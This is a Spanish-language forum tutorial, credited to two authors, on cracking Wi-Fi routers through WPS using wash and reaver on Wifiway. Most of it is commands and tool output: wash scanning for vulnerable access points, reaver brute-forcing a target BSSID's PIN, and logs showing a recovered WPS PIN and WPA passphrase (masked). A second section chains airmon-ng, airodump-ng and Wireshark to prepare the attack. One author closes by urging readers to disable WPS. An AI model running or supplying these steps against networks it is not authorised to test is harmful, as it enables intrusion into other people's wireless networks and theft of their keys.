Ejemplo de reaver en wifiway

Autores: ChimoC $ Garcad

Reaver lo podeis descargar aqui http://code.google.com/p/reaver-wps/downloads/list o bien usarlo con wifiway (que ya lo lleva incorporado)

1.- Walsh –> Lo que hará es detectar qué APs pudiesen ser vulnerables

Walsh v1.3

Required Arguments:
-i, –interface=<iface> Interface to capture packets on
-f, –file [FILE1 FILE2 FILE3 ...] Read packets from capture files

Optional Arguments:
-c, –channel=<num> Channel to listen on [auto]
-o, –out-file=<file> Write data to file
-n, –probes=<num> Maximum number of probes to send to each AP in scan mode [15]
-C, –ignore-fcs Ignore frame checksum errors
-5, –5ghz Use 5GHz 802.11 channels
-s, –scan Use scan mode
-u, –survey Use survey mode [default]
-h, –help Show help

Ejemplo de uso: walsh -i mon0

Scanning for supported APs…

00:19:15:XXXXXXXX WLAN_5XXX
00:19:15:XXXXXXXX WLAN_3XXX
X0:21:B7:XXXXXXXX XXXXXXXXX
64:68:0C:XXXXXXXX WLAN_XXXX
C4:3D:C7:XXXXXXXX ONOXXX

Lo debeis parar con control+c

2.- reaver: Sirve para lanzar los PINS e ir probando. Puede llegar a tardar muchas horas (como 11 que tardé yo, por ejemplo)

Uso: reaver -i mon0 -b C4:3D:C7:XXXXXXXX -vv

Resultado

94.67% complete @ 2012-01-08 08:34:36 (4 seconds/attempt)

  • WPS PIN: ’5XXXXXXX’
  • WPA PSK: ’1XXXXXXXXX’
  • AP SSID: ‘ONOXXXX’

Así que ya sabeis que debeis deshabilitar el WPS de vuestro router

Un saludo

ChimoC

P.D.: Si tecleais

reaver –man

Os saldrán más cosillas

Ejemplo de Garcad:

Se puede usar el binario de walsh 1.3 en wifiway 3.4 perfectamente desde el directorio por ejemplo /root al mismo tiempo que tener instalada la version 1.4

Para los que les quede duda, mas rapido en mi caso imposible 5 segundos.

Código:
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Waiting for beacon from XX:XX:XX:XX:XX:XX
[+] Switching mon0 to channel 1
[+] Associated with XX:XX:XX:XX:XX:XX (ESSID: XXXX)
[+] Trying pin XXXXXXXX
[+] Sending EAPOL START request
[+] Sending identity response
[+] Sending M2 message
[+] Sending M4 message
[+] Sending M6 message
[!] WPS transaction failed, re-trying last pin
[+] Key cracked in 5 seconds
[+] WPS PIN: 'XXXXXXXX'
[+] WPA PSK: 'nXXXXXXXXXXXXXX0'
[+] AP SSID: 'XXXXXXXX'
[+] Nothing done, nothing to save.

Yo el proceso lo hago del siguiente modo.

Pongo en modo monitor el adaptador

Código:
# airmon-ng start wlan0

Me crea un clon mon0

Necesito saber el canal que emite mi router por lo que utilizo el siguiente comando para capturar el trafico con airodump-ng y visualizar el canal

Código:
# airodump-ng mon0

Cuando se en el canal que emite, cierro la ventana y sigo con…

Código:
# airodump-ng mon0 -w wps-test --beacons --chanel NUMERO --bssid ELQUETENGO

Cuando termina el proceso de capturar abrimos con Wireshark el archivo wps-test.cab.

Yo ya se que lo tengo activado, pero como han explicado como mirarlo con Wireskark sigo con el mismo rol.

Buscamos un broadcast de nuestro router como se puede ver en la siguiente imagen.

Localizamos WPS y si esta activo o no lo esta.

Si Wifi Protected Setup visualizamos 0×02 esta activo se puede mirar si es vulnerable, si vemos 0×01 esta en modo manual, desactivado.

Como esta activada la protección con Wireskark en el archivo *.cap podemos ver 0×02 puedo empezar el ataque con el reaver.

Código:
# reaver -i mon0 -b BSSIDELQUETENGAS -c ELCANLAQUEEMITES -e ESSIDELQUETENGAS -d 15 -vv